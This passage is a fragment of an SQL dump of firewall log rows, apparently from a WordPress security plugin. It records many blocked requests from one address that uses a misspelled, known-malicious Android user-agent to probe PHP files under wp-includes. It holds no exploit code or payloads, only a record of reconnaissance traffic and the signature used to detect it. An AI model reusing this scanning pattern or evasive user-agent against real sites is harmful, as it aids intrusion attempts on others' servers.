User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9FeGNlcHRpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133787,1699930697.281520,1699930697.272900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Proxy.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9Qcm94eS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133788,1699930693.602358,1699930693.592300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Port.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9Qb3J0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133789,1699930688.546921,1699930688.538300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Iri.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9JcmkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133823,1699930871.173211,1699930871.164600,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/File.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9GaWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133790,1699930684.473194,1699930684.464500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Ipv6.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9JcHY2LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133791,1699930678.004061,1699930677.995400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/IdnaEncoder.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9JZG5hRW5jb2Rlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133822,1699930887.189085,1699930887.167200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/HTTP/Parser.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9IVFRQL1BhcnNlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133792,1699930672.742122,1699930672.733400,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Hooks.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9Ib29rcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133793,1699930667.016822,1699930667.008000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/HookManager.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9Ib29rTWFuYWdlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133794,1699930661.791582,1699930661.782300,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Exception.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9FeGNlcHRpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133902,1699931537.700645,1699931537.678900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json-schema.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24tc2NoZW1hLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133821,1699930891.558427,1699930891.542500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/IRI.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9JUkkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133795,1699930654.753095,1699930654.742200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Cookie.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9Db29raWUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133796,1699930647.296053,1699930647.286800,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Capability.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9DYXBhYmlsaXR5LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133797,1699930642.065157,1699930642.056500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Autoload.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9BdXRvbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133820,1699930896.570723,1699930896.561200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Item.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9JdGVtLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133798,1699930637.247184,1699930637.211100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/src/Auth.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3NyYy9BdXRoLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133799,1699930623.219534,1699930623.210700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/library/Requests.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL2xpYnJhcnkvUmVxdWVzdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133800,1699930613.634815,1699930613.613100,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL3dwLWluY2x1ZGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133819,1699930910.934476,1699930910.912700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Locator.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9Mb2NhdG9yLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133801,1699930597.891982,1699930597.882700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/SMTP.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci9TTVRQLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133903,1699931521.606724,1699931521.591000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-theme-json-resolver.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLXRoZW1lLWpzb24tcmVzb2x2ZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133802,1699930590.410027,1699930590.395900,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/PHPMailer.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci9QSFBNYWlsZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133818,1699930917.496764,1699930917.483200,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Misc.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1NpbXBsZVBpZS9NaXNjLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133803,1699930586.078953,1699930586.064500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/Exception.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1BIUE1haWxlci9FeGNlcHRpb24ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133804,1699930582.243320,1699930582.221500,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/PHPMailer/wp-includes/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 